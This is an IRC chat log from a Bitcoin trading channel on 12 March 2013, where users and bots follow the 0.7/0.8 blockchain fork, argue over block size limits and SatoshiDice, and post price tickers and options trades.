[O.BTCUSD.P750T] 23 @ 0.86122741 = 19.8082 BTC [+] Mar 12 05:05:10 Aight, I guaratneed 75 BTC to be sold at.. $2799 Mar 12 05:05:16 for the next 3 hours Mar 12 05:05:22 lets see what happenes Mar 12 05:05:53 gesell: the attitude of the dev team has always been that bitcoin is their little science experiment and its not intended for production Mar 12 05:06:13 I'm back to save the day Mar 12 05:06:14 lol Mar 12 05:06:50 no no Mar 12 05:07:07 must be liek dat. Mar 12 05:07:15 dub: i dont think my statement disagress with that at all. just looking at new horizons for the experiment Mar 12 05:07:25 Luke-Jr YOU MUST BEHAVE U HEAR ME Mar 12 05:07:39 you're going to have a hard time selling these guys oversight Mar 12 05:08:10 dub: i agree. if it comes though it would be slowly and with a different label Mar 12 05:09:22 gesell: https://github.com/sipa/bitcoin/commit/ca7739797ce7990ebb9f33852412f2c3f6950b0d Mar 12 05:09:28 saw it Mar 12 05:10:13 ;;ticker Mar 12 05:10:14 BTCUSD ticker | Best bid: 42.60000, Best ask: 42.65559, Bid-ask spread: 0.05559, Last trade: 42.60000, 24 hour volume: 109984.04612509, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.45198 Mar 12 05:10:19 hey did we recover Mar 12 05:10:23 this event is fascinating actually Mar 12 05:10:38 nature is amazing. ~ ron swanson Mar 12 05:10:49 not recovered, there still a fork. Mar 12 05:12:11 ;;ticker Mar 12 05:12:12 BTCUSD ticker | Best bid: 42.60000, Best ask: 42.72770, Bid-ask spread: 0.12770, Last trade: 42.60000, 24 hour volume: 109893.67866310, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.44885 Mar 12 05:13:03 ;;goxlag Mar 12 05:13:03 482.005774 seconds Mar 12 05:13:56 ;;bc,stats Mar 12 05:13:58 Current Blocks: 225452 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 339 blocks | Next Difficulty In About: 1 day, 21 hours, 12 minutes, and 0 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Mar 12 05:14:23 ;;bc,price Mar 12 05:14:25 Next Price Estimate: 46.86 | Next Price In About 3 days, 1 hour, 50 minutes, and 34 seconds Mar 12 05:14:33 lies Mar 12 05:15:48 ;;eightball How's LTC Mar 12 05:15:49 One would be wise to think so. Mar 12 05:16:09 erm, i shoulda asked a yes or no q Mar 12 05:16:10 lol Mar 12 05:16:28 blacklistblock = regulation. though peer agreed. which is fascinating because we do not have such language in traditional finance Mar 12 05:16:58 or we do but a bit more abstracted and not so clear as it is here Mar 12 05:17:11 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 12 05:17:14 looks like flipper. Mar 12 05:17:27 that is a huge spread Mar 12 05:17:42 pres B for left side and S for right side Mar 12 05:17:44 play! Mar 12 05:17:45 In gaven we trust Mar 12 05:18:42 Maybe Satoshi is looking from afar Mar 12 05:19:58 ;;ticker Mar 12 05:19:58 BTCUSD ticker | Best bid: 44.00000, Best ask: 44.03000, Bid-ask spread: 0.03000, Last trade: 44.00000, 24 hour volume: 111563.57296537, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.44028 Mar 12 05:21:22 just for the record the drop started at 2:41am GMT+1 (had some logs) Mar 12 05:21:35 Bowjob: I'd rather put money on satoshi being 2 or 3 people over in -dev Mar 12 05:22:07 ;;eightball Buy! Buy! Buy? Mar 12 05:22:07 _I_ don't know. Mar 12 05:22:26 ;;eightball Is Satoshi Nakamoto 1 person? Mar 12 05:22:27 What are you asking me for? Mar 12 05:22:35 >_> Mar 12 05:23:25 ;;eightball Sell all BTC for LTC? Mar 12 05:23:26 The outlook is good. Mar 12 05:23:30 "(04:04:59) gmaxwell: jeffgarzik is /msging me telling me that jgarzik is an imposter." --- heh, and people still have the heart to troll. oh internets Mar 12 05:24:04 !ticker m ^oix Mar 12 05:24:06 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00000039 / 0.00000053 / 0.00000053 (50897 shares, 0.00 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 12 05:25:40 mircea_popescu: what's up with that? Mar 12 05:25:44 oix killed bitcoin Mar 12 05:25:55 smickles i just dug up oix to see wtf. Mar 12 05:26:02 ;;ticker --last Mar 12 05:26:04 45.00000 Mar 12 05:26:08 ;;goxlag Mar 12 05:26:10 559.099063 seconds Mar 12 05:26:14 but basically nothing is wrong with it Mar 12 05:26:25 just... the weight of the calls sold is so much heavier than the weight of the puts bought just now Mar 12 05:26:32 that the oix still points to high btc Mar 12 05:26:52 so it is working as intended, be that useful or not Mar 12 05:27:02 so its still bullish btc? Mar 12 05:27:07 devs dont seem to be using public chat now Mar 12 05:27:22 btc always bullish (in betweeen crashes) Mar 12 05:27:39 mircea_popescu: isn't it off by about 8 digits? Mar 12 05:28:04 !ticker m ^oix Mar 12 05:28:06 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 39.89104856 / 0.00000053 / 53.27237035 (50897 shares, 0.00 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 12 05:28:14 okay everything fixed Mar 12 05:28:15 heh yeah 1 sec Mar 12 05:28:17 bad cache Mar 12 05:29:11 http://stockcharts.com/school/doku.php?id=chart_school:chart_analysis:chart_patterns:double_top_reversal Mar 12 05:29:29 !ticker m ^oix Mar 12 05:29:31 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 39.89104856 / 53.82025731 / 53.27237035 (50897 shares, 0.00 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 12 05:29:43 yay:D Mar 12 05:30:09 wait volume went away nao lo;\ Mar 12 05:30:55 $markov Mar 12 05:30:55 mircea_popescu: your blog fails to load Mar 12 05:31:01 lol Mar 12 05:32:03 lol Mar 12 05:35:15 how many hours till next asicminer divy? Mar 12 05:35:26 48? Mar 12 05:36:45 ;;goxlag Mar 12 05:36:45 166.108439 seconds Mar 12 05:37:28 ;;ticker --last Mar 12 05:37:29 44.90000 Mar 12 05:39:32 jesus whats going on with the blockchain?? Mar 12 05:39:41 http://bitcoin.org/chainfork.html Mar 12 05:39:56 know waht? pps pool are boned Mar 12 05:40:14 bitcoin split, price crashed all while you were takign a piss Mar 12 05:40:18 all well now. Mar 12 05:40:33 safe to recieve payments again? Mar 12 05:40:42 nope Mar 12 05:41:16 you ought to wait until the .7 (short) chain grows longer than the main chain Mar 12 05:41:25 and some miners are still adding to the main chain Mar 12 05:41:47 Schrödinger's BitBet - This bet will have more total BTC bet on Yes than on No before it closes. Mar 12 05:41:48 and there is still confusion among the devs Mar 12 05:41:54 good? Mar 12 05:42:15 ThickAsThieves: awesome Mar 12 05:42:30 i had a few ideas for meta bets Mar 12 05:42:36 had to submit one Mar 12 05:43:00 hmmm Mar 12 05:43:01 dunno if those are approved Mar 12 05:43:57 so if someone sends me coins now they're gone for good? Mar 12 05:44:33 the bet has a fault, or a bonus depending on how you look at it Mar 12 05:44:38 imho they will be respendable with the longer chain not containing that tx Mar 12 05:44:51 people will bet til it closes ... and after Mar 12 05:45:31 ThickAsThievs - you just blew my mind Mar 12 05:45:32 which mean a few bitbets will have to be invalidated Mar 12 05:45:40 or something Mar 12 05:45:42 dunno Mar 12 05:46:41 >The risk is small because this is not a network split-- transactions are being sent to both sides of the chain split, and it is unlikely (but possible) that somebody could get two versions of the same transaction into the two sides of the chain. Mar 12 05:46:42 ah Mar 12 05:46:48 apparently not a real problem Mar 12 05:46:49 < BitHub> so if someone sends me coins now they're gone for good? << no, it's up to which chain it's included in Mar 12 05:47:11 mmk Mar 12 05:47:35 basically, it's just risky Mar 12 05:47:58 totoally oposite of bitcoin in general. Mar 12 05:48:08 yup Mar 12 05:48:15 fuckin keboard fails Mar 12 05:48:33 and it is unlikely (but possible) <><< yeah. they know. Mar 12 05:48:43 because it's just a prototype, right ? Mar 12 05:49:11 what is the barrier to entry to this, make two txs,b roadcast it to two diff nodes. Mar 12 05:49:16 the version is below 1 right? Mar 12 05:49:20 so don fuck around. Mar 12 05:50:25 ;;goxlag Mar 12 05:50:26 17.295316 seconds Mar 12 05:50:34 ;;ticker Mar 12 05:50:35 BTCUSD ticker | Best bid: 45.01000, Best ask: 45.89900, Bid-ask spread: 0.88900, Last trade: 45.00000, 24 hour volume: 119265.24377758, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.50395 Mar 12 05:50:42 how can you tell if your bitcoin daemon is on the right chain? Mar 12 05:50:46 (on the 0.7 chain) Mar 12 05:51:22 topace_: as a regualr user, i dunno. but it'll switch over automatically when the .7 chain is longer Mar 12 05:51:24 by the block height Mar 12 05:51:33 ? Mar 12 05:51:49 topace_ you can't Mar 12 05:51:52 bsically. Mar 12 05:51:57 cause it's not a matter of your daemon Mar 12 05:52:13 you just emit txs. the miners add them on their mempools Mar 12 05:52:17 you have no idea what they run Mar 12 05:53:24 right now, you can 'bitcoind getinfo' and look at the height. current 'wrong' chain is at 225453, .7 is at 225442 Mar 12 05:53:41 what i said. Mar 12 05:54:09 kakobrekla: but the differenc will be more and more difficult to tell soon Mar 12 05:54:14 yep Mar 12 05:54:42 good luck getting the miners to accept a 14 block loss Mar 12 05:54:53 that's like 350 btc Mar 12 05:54:55 pool are gonna hurt Mar 12 05:54:59 mircea_popescu: some arn't, the largest pools are Mar 12 05:55:10 only pps pools are fucked Mar 12 05:55:11 smickles explain why the "wrong" one is longer then. Mar 12 05:55:14 good day for not to be a pool op Mar 12 05:55:28 kakobrekla it prolly destroyes those unfortunate fucks that paid out on the 0 diff Mar 12 05:55:40 mircea_popescu: it mined a block sized larger than 250k Mar 12 05:55:50 funny, no? Mar 12 05:55:52 no i meant blocvk height Mar 12 05:56:08 the wrong chain is lionger yet you're telling me the miners are moving. Mar 12 05:56:09 proof ? Mar 12 05:56:20 the wrong one mined a block which .7 clients couldn't see Mar 12 05:56:53 yeah... Mar 12 05:56:54 good day for not being the guild pool op Mar 12 05:56:57 mircea_popescu: look at blockchain.info, the major pools are mining an orphaned chain Mar 12 05:57:01 double whammy there Mar 12 05:57:02 EXACTLY Mar 12 05:57:09 and my point is, they will continue to do so. Mar 12 05:57:13 because they have no incentive not to. Mar 12 05:57:19 and if they move back in they're 400 btc out. Mar 12 05:57:25 you've got it backwards tho Mar 12 05:57:28 have i ? Mar 12 05:57:28 well bitbet seems to be on the right one Mar 12 05:57:33 the orphaned chain is the 'right' one Mar 12 05:57:42 it's just not long enough yet Mar 12 05:57:47 ah Mar 12 05:57:51 this makes sense. Mar 12 05:58:02 let me guess... so the longer chain is the wrong one. because that's why it's longer Mar 12 05:58:05 cause nobody mines on it. Mar 12 05:58:06 wtf ?! Mar 12 05:58:12 yeah, gotta love all those peeps encouraging the pool ops to mine blocks larger than 250k b/c of SD Mar 12 05:58:39 the crash and recovery in ascii glory http://i.imgur.com/hgYAta0.gif Mar 12 05:58:42 they mined on the 'wrong' one for some time b/f peeps realized there was a problem Mar 12 05:59:01 now the 'right' one is trying to catch up Mar 12 05:59:13 i thoguht its solved already Mar 12 05:59:16 i love the various people on bitcointalk trying to move the conversation Mar 12 05:59:28 anywhere but away from the point that devs fucked up Mar 12 05:59:40 Bowjob: they have a band=aid fix, revert to the old chain Mar 12 05:59:41 anything and everything shall be discussed, but god forbid someone gets bitchslapped Mar 12 06:00:05 and i hope everyone is actually mining on the 0.72 chain Mar 12 06:00:21 Bowjob we see their rate of gain Mar 12 06:00:27 if in an hour the "werong" one is +2... Mar 12 06:00:27 Bowjob: some are, some arnt Mar 12 06:00:41 ;;bc,stats Mar 12 06:00:43 Current Blocks: 225453 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 338 blocks | Next Difficulty In About: 1 day, 21 hours, 4 minutes, and 0 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Mar 12 06:00:53 225453 is the 'wrong' chain Mar 12 06:01:19 225443 is the .7 chain Mar 12 06:01:24 from now on ill be runing 0.1 legacy Mar 12 06:01:56 if i had enough coins to justify it, i might run one of each Mar 12 06:02:06 it's only 8 right now Mar 12 06:03:53 ya know, there's a chance this band-aid fix won't work, the .8 chain looks like it might be going faster than the .7 Mar 12 06:03:58 BFL_Josh : 11 March 2013 Update : Say what you want about BFL, but we make ASICs look good. Mar 12 06:04:07 best joke ever Mar 12 06:04:20 They make Avalon look good Mar 12 06:04:37 heck, Avalons come with gloves Mar 12 06:05:28 smickles aha Mar 12 06:06:11 [MPEX] [O.BTCUSD.P730T] 15 @ 0.81355 = 12.2033 BTC [-] Mar 12 06:07:03 mhm.. http://coinlab.com/ Mar 12 06:07:10 watching this is entertaining as fuck Mar 12 06:07:58 The 'right' chain is definately catching up to the 'wrong' one Mar 12 06:08:36 I think in the past hour the 'right' chain has gone up 5 blocks, the 'wrong' one has gone up 2 Mar 12 06:08:57 PeterL they're even now or am i on delayed data ? Mar 12 06:09:02 ah, i think i screwed up my look at it then Mar 12 06:09:48 they're still 9 blocks from forcing the switch Mar 12 06:10:10 8 blocks to be even Mar 12 06:11:20 how will this outage affect satoshiDice share price? Mar 12 06:11:25 bt we're winnign at least Mar 12 06:11:40 is the wrong one taller than 445 ? Mar 12 06:11:48 !ticker m s.dice Mar 12 06:11:48 453 Mar 12 06:11:50 [MPEX:S.DICE] 1D: 0.00530001 / 0.00551785 / 0.00569996 (11580 shares, 63.90 BTC), 7D: 0.00300001 / 0.0051045 / 0.006 (200407 shares, 1,022.98 BTC), 30D: 0.00300001 / 0.00614247 / 0.0069 (2518785 shares, 15,471.58 BTC) Mar 12 06:12:01 PeterL so far doesn't seem to have affected it Mar 12 06:12:20 PeterL: it was the anti-SD'ers who forced this issue Mar 12 06:12:36 smickles the 250k arbitrary limit had to go anyway Mar 12 06:12:44 it had no point being there in the first place Mar 12 06:13:03 yeah, but not now. it could've undergone more testing Mar 12 06:13:19 not putting bullshit in the codebase takes no testing Mar 12 06:13:25 it just takes some firm adherence to coding principle. Mar 12 06:13:45 so you think there should be no limit? Mar 12 06:13:52 the 1mb limit is THE limit. Mar 12 06:14:23 why a souch arbitrary number Mar 12 06:14:29 they need to go through the whole code and take out all the bs of the sort. Mar 12 06:14:32 its no better than 250k Mar 12 06:14:36 really Mar 12 06:14:37 yeah, but Mar 12 06:14:43 the 1mb is baked in now Mar 12 06:14:56 If we hit 1mb limit Mar 12 06:14:58 then what Mar 12 06:14:59 lol Mar 12 06:15:02 the (undocumented) limit to client tx size for instance, is not. Mar 12 06:15:04 txfees rise Mar 12 06:15:08 Satoshi envisioned 100 GB per day Mar 12 06:17:04 jesus multiplied 7 fishes Mar 12 06:17:28 he had fishes under the table Mar 12 06:17:48 btcguild gunning for 5 in a row now Mar 12 06:18:58 http://youtu.be/c0SuIMUoShI << my gf sends her regards Mar 12 06:20:34 \: Mar 12 06:21:06 ya know, it's quite possible that there is only one electron in the whole universe Mar 12 06:21:53 better not tell the protons Mar 12 06:23:15 the protons can't tell one electron from the other anyway Mar 12 06:23:23 they all look alike Mar 12 06:23:51 depends on the scale. at the plank scale everything is a different Mar 12 06:24:03 s/a// Mar 12 06:24:11 so there is a 1mb limit now? Mar 12 06:24:47 no theres a 250k limit Mar 12 06:26:11 mod6: i thought all electrons were indistinguishable as far as our best tech can tell Mar 12 06:27:00 and the wiki says that electrons can't be distinguished even in principle Mar 12 06:27:04 uhhh, i dunno Mar 12 06:27:15 if its on the internet it must be true Mar 12 06:27:44 it's stuff i recall from studying science tho Mar 12 06:28:07 ;;goxlag Mar 12 06:28:08 0.802029 seconds Mar 12 06:28:13 PeterL: it was the anti-SD'ers who forced this issue Mar 12 06:28:14 wat Mar 12 06:28:19 im not trying to troll, i don't know srsly. Mar 12 06:28:33 ;;ticker Mar 12 06:28:34 BTCUSD ticker | Best bid: 44.64974, Best ask: 44.87125, Bid-ask spread: 0.22151, Last trade: 44.88000, 24 hour volume: 126419.84432523, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.49347 Mar 12 06:29:06 dub: this would not have happened now if people were not encouraging pool ops to raise the soft limit on block size because of 'satoshiDice spam' Mar 12 06:29:41 uh they had to raise it Mar 12 06:29:43 no Mar 12 06:29:46 it would have happened later Mar 12 06:29:46 because of the dice spam Mar 12 06:29:50 when it'd have been worse. Mar 12 06:30:06 or after it got caught in testing Mar 12 06:30:16 and had no issue at all Mar 12 06:30:19 who knows Mar 12 06:30:31 yeah. right. Mar 12 06:30:34 the soft limit was hit Mar 12 06:30:35 because bitcoin is tested. Mar 12 06:31:02 mod6 there always was a 1mb limit Mar 12 06:31:15 mircea_popescu: they do do a little on the testnet, it's just that the queue of stuff to test is long, and noone want's to help out Mar 12 06:31:43 dub: http://blockchain.info/block-index/357948/000000000000015c50b165fcdd33556f8b44800c5298943ac70b112df480c023 the soft limit was raised Mar 12 06:31:49 ;;tslb Mar 12 06:31:51 Time since last block: 1 hour, 3 minutes, and 12 seconds Mar 12 06:31:56 that's the offending block Mar 12 06:32:01 uff, coinbr back online Mar 12 06:32:14 smickles: yes it was raised to accomodate dice Mar 12 06:32:23 france Mar 12 06:32:26 should have known Mar 12 06:32:35 mircea_popescu: 23 minutes on the .7 chain Mar 12 06:32:54 dub: we weren't hitting the softcap that offten Mar 12 06:33:03 smickles maybe they'll merge then Mar 12 06:33:23 smickles: yes we were, there was 4000 unconfirmed txn when the call went out to up the limit Mar 12 06:33:41 smickles: it became a problem when dice increased their fee Mar 12 06:33:54 pushing everyone else out of the way Mar 12 06:33:56 right Mar 12 06:33:58 hmm, i recall there being thousands of unconfirmed txns for months and months Mar 12 06:34:06 smickles: yeah dice txns Mar 12 06:34:36 size 980kb nice block lol Mar 12 06:34:44 which everyone was used to living with, when it suddenly turned into mom and pop's txns taking days to confirm somethign had tobe done Mar 12 06:35:04 dub mom and pop need to stfu and pay for tx Mar 12 06:35:13 yes but they didn't know that Mar 12 06:35:19 right. Mar 12 06:35:21 had no forewarning Mar 12 06:35:26 its on the interwebs so its free etc. Mar 12 06:35:51 not like iot says right there, "put a little tx fee, it helps the network" etc Mar 12 06:35:57 so sayign teh anti-dice crew are responsible is wrong Mar 12 06:36:20 dub: i can see that we disagree, but i don't think the limit should be raised until the necessary txfee is unreasonably high Mar 12 06:36:24 the idiots are responsible. Mar 12 06:36:28 !ticker m ^oix Mar 12 06:36:29 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 39.76255342 / 44.74483325 / 53.27237035 (65320 shares, 22,376.48 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 12 06:36:40 heh 44 Mar 12 06:36:56 dub: and i don't think i said they were responsible, i said they forced the issue Mar 12 06:37:12 anti-dice would be work to exclude their tsn not increas the limit Mar 12 06:37:35 some were saying that, some were saying raise the limit Mar 12 06:39:13 what's the mtgox lag command? Mar 12 06:39:19 ;;goxlag Mar 12 06:39:19 ;;lag Mar 12 06:39:20 0.156882 seconds Mar 12 06:39:20 Error: "lag" is not a valid command. Mar 12 06:39:24 ;;goxlag Mar 12 06:39:24 1.148831 seconds Mar 12 06:39:26 cool thanks. Mar 12 06:43:47 "antifragility" Mar 12 06:46:31 what was the delay between blockchain fork and broadcast? Mar 12 06:46:44 i bet < 5 minutes Mar 12 06:47:35 broadcast? Mar 12 06:48:01 $mpexlag Mar 12 06:48:01 smickles: 0.0727469921112 seconds Mar 12 06:48:26 mircea_popescu: ^^ Mar 12 06:49:04 was there an alert sent to 0.8? I don't see it in .7 Mar 12 06:49:13 haha Mar 12 06:49:18 $mpexlag Mar 12 06:49:20 mircea_popescu: 0.103024959564 seconds Mar 12 06:49:24 benkay: it was less than 6 block according to one claim by someone in -dev Mar 12 06:49:27 dude this will be so humiliating to mtgox Mar 12 06:49:34 thing about it, you're getting it through 2 proxies Mar 12 06:49:45 naw man Mar 12 06:49:50 rubes don't care Mar 12 06:49:58 they have a fancy website Mar 12 06:50:10 heh. Mar 12 06:50:14 oh wait, you said "humiliating" Mar 12 06:50:20 and they're bringing the clap to wallstreet Mar 12 06:50:21 yeah maybe. Mar 12 06:50:40 i hope morgan and co drop the ball hard Mar 12 06:51:04 be a shame to see the us consolidate under their iron grip Mar 12 06:51:17 bitcoind listtransactions bitches abotu safe mode, is there a way to tell it to just show me the transactions anyways? Mar 12 06:51:20 i cant see wall st investing in something that is controlled by devs in IRC Mar 12 06:51:52 "wall st" != jp Mar 12 06:52:21 $mpexlag Mar 12 06:52:22 mircea_popescu: 0.104865074158 seconds Mar 12 06:52:22 topace_: bitcoind -disablesafemode Mar 12 06:52:30 topace_ careful with that one Mar 12 06:53:08 ;;wallstreet Mar 12 06:53:08 Error: "wallstreet" is not a valid command. Mar 12 06:53:26 topace: at least you didnt freeze trading :D Mar 12 06:53:43 yea, no need to do that :p Mar 12 06:53:52 i found that funny >,> Mar 12 06:54:12 who freezed trading? Mar 12 06:54:13 [MPEX] [O.BTCUSD.P370T] 1000 @ 0.08731834 = 87.3183 BTC [+] Mar 12 06:54:13 i suppose its an okay response to kneejerk reaction Mar 12 06:54:18 btct Mar 12 06:54:20 [MPEX] [O.BTCUSD.P390T] 1000 @ 0.10970785 = 109.7079 BTC [+] Mar 12 06:55:03 hm Mar 12 06:55:07 geez, we're still 9 blocks from a re-org Mar 12 06:55:08 having tie-ins with ozco's systems, and others, my system keeps a close eye on all transactions lol Mar 12 06:55:18 ;;calc 39 / 1.109 Mar 12 06:55:19 35.1668169522 Mar 12 06:55:23 35 ? srsly ? Mar 12 06:55:31 pools offline Mar 12 06:55:36 and/or miners Mar 12 06:55:53 only those pools who were properly setup/unefected continue Mar 12 06:55:53 mircea_popescu: we had a double top and a crisis. we're going to 2 Mar 12 06:55:57 like.. ozco :P Mar 12 06:56:10 who didnt set their block size to 1bazillion Mar 12 06:56:12 mircea_popescu: what are you calculating there? Mar 12 06:56:38 benkay: break even of a put Mar 12 06:56:43 225445 still the top of the 0.7 ? my 0.8 client still shows 225453 Mar 12 06:56:51 what's the 1.109? interest rate? Mar 12 06:56:58 oh, cost? Mar 12 06:56:59 topace_: yeah Mar 12 06:57:05 shit this is embarrassing. Mar 12 06:57:05 benkay what those puts imply pricewise Mar 12 06:57:17 benkay: 1+cost Mar 12 06:57:33 smickles:so the 0.8 clients wont switch until the height is more? Mar 12 06:57:46 topace_: yea Mar 12 06:57:53 1 more Mar 12 06:57:59 cool im going to bed then, lol Mar 12 06:58:02 er, 1 more than the current Mar 12 06:58:04 thanks you two Mar 12 06:58:12 so , 9 more blocks to go Mar 12 06:59:15 still at 8 ? Mar 12 07:00:03 yeah, still 8 blocks different Mar 12 07:00:32 ;;tslb Mar 12 07:00:34 Time since last block: 1 hour, 31 minutes, and 55 seconds Mar 12 07:00:42 at least that didn't move. Mar 12 07:01:07 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.38403908 = 384.0391 BTC [+] Mar 12 07:01:08 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.34210801 = 342.108 BTC [+] Mar 12 07:01:11 [MPEX] [O.BTCUSD.P510T] 1000 @ 0.30194268 = 301.9427 BTC [+] Mar 12 07:01:12 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.26374232 = 263.7423 BTC [+] Mar 12 07:01:19 shorts covering Mar 12 07:01:22 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.22771516 = 227.7152 BTC [+] Mar 12 07:01:23 smickles maybe you're right Mar 12 07:01:37 !m ^oix Mar 12 07:01:41 !ticker m ^oix Mar 12 07:02:31 mircea_popescu: i only have a self taught understanding of technicals and i see it, so people who trade on technicals probably see it too and are taking action Mar 12 07:03:01 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Mar 12 07:03:19 $mpexlag Mar 12 07:03:20 pizzaman1337: 0.0712060928345 seconds Mar 12 07:04:34 peter - if satoshi dice can land some press out of this, then probably there will be some more betting next few weeks. Mar 12 07:04:48 "s.dice grows too large for bitcoin" Mar 12 07:04:59 omg she is just gloating over here lol, she's been calling 'em mario coins since day one. Mar 12 07:05:23 who lol Mar 12 07:05:26 she's like, "oh gonna go play more dungons and dragons 'eh...." Mar 12 07:05:32 my gf Mar 12 07:05:37 she's a btc hater Mar 12 07:05:46 and now shes gloating Mar 12 07:06:34 :/ Mar 12 07:06:38 lo Mar 12 07:06:39 l Mar 12 07:07:18 mp s.dice grows too large for bitcoin sounds way better than "bitcoin is forked" btc people who talk to the press have no option but to blame satoshidice very loudly. Mar 12 07:07:42 I'm an s.dice shareholder btw Mar 12 07:07:45 heh Mar 12 07:08:05 sure, blame canada why not. Mar 12 07:08:12 good thing this happened now and not when the market cap is $5B Mar 12 07:08:29 maximian if the idiots hadn't put in the 250k limit it would have jhappened and been resolved in 2011 Mar 12 07:08:35 nice to see the gap getting shorter Mar 12 07:08:44 when you know... 1 single block would have caused it, it'd have been immediately noticed but no forking Mar 12 07:08:57 I'm sure this stuff will happen at $5B too. that's like the size of the New York School district Mar 12 07:09:01 [HAVELOCK] [SDICE] 1 @ 0.5949999 BTC [+] Mar 12 07:09:22 mp the idots was satoshi, he just assumed we would change it later Mar 12 07:09:25 8 blocks to go Mar 12 07:09:28 the-bucket-shop basically it will happen indefinitely for as long as we have a devteam that mostly works at trying to play government. Mar 12 07:09:28 they did it to protect from spamming Mar 12 07:09:39 Chaang-Noi i don't care what the excuse is. Mar 12 07:09:44 they did it because their heads don't work. Mar 12 07:09:58 he's not an idiot. he was very smart, if these new idiots can't hack their way out of a wet paper sack, thats not really his fault. Mar 12 07:10:11 in the frist few months someone could ahve attacked it with spam and killed it, who is to say that would not have happened? Mar 12 07:10:18 dude first frw months Mar 12 07:10:22 it is 2013 have some mercy Mar 12 07:10:32 i agree it should ahve been changed by now Mar 12 07:10:36 long by! Mar 12 07:10:40 but having it in the first place was a good idea Mar 12 07:10:45 jesus i'm clueless about bitcoin internals. Mar 12 07:10:52 if it gets to the point where i am raising objections and they make sense Mar 12 07:10:56 IT IS WAY TOO LONG Mar 12 07:10:57 honestly this issue is one of the reasons i went so hard core into ltc Mar 12 07:11:12 and that was over a year ago... Mar 12 07:11:27 how does ltc fix that ? Mar 12 07:11:46 faster blocks can fit more transactions Mar 12 07:12:07 also i have more faith in the ltc pools to change this cuz it is a small network now Mar 12 07:12:20 we can fix it with out too much issue, and i ahve been trying to get peole to move Mar 12 07:12:22 well the bdb index lock bug isnt only triggered by pure # of transactions Mar 12 07:12:47 pigeons it is size of the blocks right? Mar 12 07:12:50 no Mar 12 07:12:55 what is it then? Mar 12 07:12:55 not directly Mar 12 07:13:05 well indirectly then Mar 12 07:13:13 ;;ticker Mar 12 07:13:14 BTCUSD ticker | Best bid: 45.01200, Best ask: 45.35277, Bid-ask spread: 0.34077, Last trade: 45.42658, 24 hour volume: 129864.74982214, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.47226 Mar 12 07:14:00 to say that litecoin is in anyway better on this issue is ridiculous Mar 12 07:14:07 [MPEX] [O.BTCUSD.P550T] 275 @ 0.38399185 = 105.5978 BTC [-] Mar 12 07:14:08 [MPEX] [O.BTCUSD.P530T] 275 @ 0.34205951 = 94.0664 BTC [-] Mar 12 07:14:13 hm. Mar 12 07:14:14 [MPEX] [O.BTCUSD.P510T] 275 @ 0.30189328 = 83.0207 BTC [-] Mar 12 07:14:15 [MPEX] [O.BTCUSD.P490T] 275 @ 0.26369245 = 72.5154 BTC [-] Mar 12 07:14:19 perhaps things are actually settling down ? Mar 12 07:14:22 ;;ticker Mar 12 07:14:23 [MPEX] [O.BTCUSD.P470T] 275 @ 0.22766534 = 62.608 BTC [-] Mar 12 07:14:24 BTCUSD ticker | Best bid: 45.01200, Best ask: 45.42580, Bid-ask spread: 0.41380, Last trade: 45.42600, 24 hour volume: 129868.46652021, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.47196 Mar 12 07:14:36 how are the chain size and this recent fork related? Mar 12 07:15:07 benkay: not chain size, block size Mar 12 07:15:57 okay Mar 12 07:16:27 pigeons you have not explained what you think the issue is yet you say what i said is silly... it is hard to attack a point you wont state Mar 12 07:16:43 what's this referring to: mircea_popescu: maximian if the idiots hadn't put in the 250k limit it would have jhappened and been resolved in 2011 Mar 12 07:17:30 benkay the presence of a 250k arbitrary block limit Mar 12 07:17:39 prevented the underlying problem of the db from being discovered Mar 12 07:17:51 until that moment when a perfect storm composed out of a db upgrade and the limit removal Mar 12 07:17:56 created two almost equal miner bases Mar 12 07:18:06 oh i see, chain size and this fork i are idiots Mar 12 07:18:09 this could have easily been avoided by simply not relying on magic numbers. Mar 12 07:18:24 heh Mar 12 07:18:30 and it will ever be the case that whenever code contains a number based on an assumption Mar 12 07:18:31 developers hate unconstrained systems Mar 12 07:18:35 that code wuill break spectacularly. Mar 12 07:18:40 3.00% fee of CaVirtex Mar 12 07:18:44 thats steep Mar 12 07:18:51 [MPEX] [O.BTCUSD.C410T] 3 @ 0.15129407 = 0.4539 BTC [+] Mar 12 07:19:28 it can be constrained to 2tb for start Mar 12 07:21:00 it's just not how you code. Mar 12 07:21:09 0, 1, infinity. Mar 12 07:21:12 that's the motherfucking rule. Mar 12 07:21:46 Bowjob: cavirtex is only 3% to start with, its volume based... pretty easy to get down tto 1% Mar 12 07:21:49 or even 0.5% Mar 12 07:22:11 $mpex lag Mar 12 07:22:16 $mpexlag Mar 12 07:22:17 smickles: 0.10756111145 seconds Mar 12 07:22:26 dont i get charged per trade? Mar 12 07:22:34 so I have to keep trading until I bring it down to 1% Mar 12 07:22:56 yeah it was .5% for its first couple years but couldnt make any money + scammers Mar 12 07:23:21 that interac email transfer thing was a mistake Mar 12 07:23:25 some trolling fun 